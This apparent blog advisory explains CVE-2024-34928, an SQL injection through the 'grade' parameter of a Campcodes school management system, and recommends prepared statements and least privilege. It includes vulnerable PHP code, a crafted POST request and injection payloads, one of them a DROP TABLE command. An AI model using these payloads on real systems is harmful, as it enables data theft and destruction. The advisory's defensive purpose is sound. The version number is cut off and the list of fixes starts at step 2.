CVE-2024-34928 - Critical SQL Injection Vulnerability in Campcodes Complete Web-Based School Management System 1. – How Attackers Can Exploit the “grade” Parameter

A new and dangerous SQL injection vulnerability (CVE-2024-34928) has been found in the Campcodes Complete Web-Based School Management System version 1.. This bug could let hackers get unauthorized access, steal sensitive data, or even fully control parts of your school management platform. In this post, we’ll break down what this vulnerability is, how it works, give you a real code example, and explain how you can fix and protect yourself.

What is CVE-2024-34928?

CVE-2024-34928 is a SQL Injection vulnerability found in the /model/update_subject_routing.php file. The bug allows attackers to run any SQL command they want — just by tampering with the grade input parameter in a web request.

Version: 1.

- Vulnerable File: /model/update_subject_routing.php

Vulnerable Parameter: grade

- Full CVE Reference: NVD CVE-2024-34928 (pending publication)

How The Vulnerability Works

The problem happens because the code in /model/update_subject_routing.php takes user input from the grade parameter and plugs it directly into an SQL query — without any filtering or escaping. This lets attackers “inject” malicious SQL.

Suppose we have the following code snippet in update_subject_routing.php

<?php
$id = $_POST['id'];
$subject = $_POST['subject'];
$grade = $_POST['grade']; // Vulnerable parameter

// Vulnerable SQL query
$sql = "UPDATE subject_routing SET grade='$grade' WHERE id='$id' AND subject='$subject'";
mysqli_query($conn, $sql);
?>

What’s wrong here?
The user‐provided grade value is put directly into the SQL statement, so an attacker can sneak in SQL code.

An attacker can send a crafted POST request like this

POST /model/update_subject_routing.php HTTP/1.1
Host: victim-school.edu
Content-Type: application/x-www-form-urlencoded

id=10&subject=Maths&grade=1', section='B' -- 

What happens:

The injected value closes the initial single quote, adding their own SQL. The query actually becomes

UPDATE subject_routing SET grade='1', section='B' -- ' WHERE id='10' AND subject='Maths'

Everything after -- is treated as a comment by SQL, so only the attacker’s part is executed. They can change other fields, leak sensitive data, or worse.

By manipulating the input further, an attacker could even attempt to extract all users

grade='; SELECT * FROM users; --

Or delete data

grade='; DROP TABLE users; --

Always use prepared statements to keep user input separate from your SQL syntax

$stmt = $conn->prepare("UPDATE subject_routing SET grade=? WHERE id=? AND subject=?");
$stmt->bind_param('sis', $grade, $id, $subject);
$stmt->execute();

2. Validate Input

Before using user-provided data, verify it’s in the expected format (for example, grade should only be a single letter/number).

3. Update Software

Check the official Campcodes site for any patches or updates addressing this vulnerability.

4. Restrict Database Privileges

Limit what your web app’s database user is allowed to do. For example, don’t give it permission to DROP tables.

References

- National Vulnerability Database Listing (Soon)
- Exploit Database (Campcodes) (pending)
- Campcodes Official Site
- OWASP SQL Injection Explained
- PHP: SQL Injection Prevention

Final Thoughts

SQL injection is one of the oldest — and still most dangerous — vulnerabilities out there. CVE-2024-34928 shows that even new software can fall prey to old mistakes if developers aren’t careful with user input.

If you manage Campcodes School Management System, update and patch immediately, and never trust user input in your SQL queries!

Have questions or need help fixing your code? Drop a comment below or reach out to a security specialist.

Timeline

Published on: 05/23/2024 17:15:29 UTC
Last modified on: 08/02/2024 02:59:22 UTC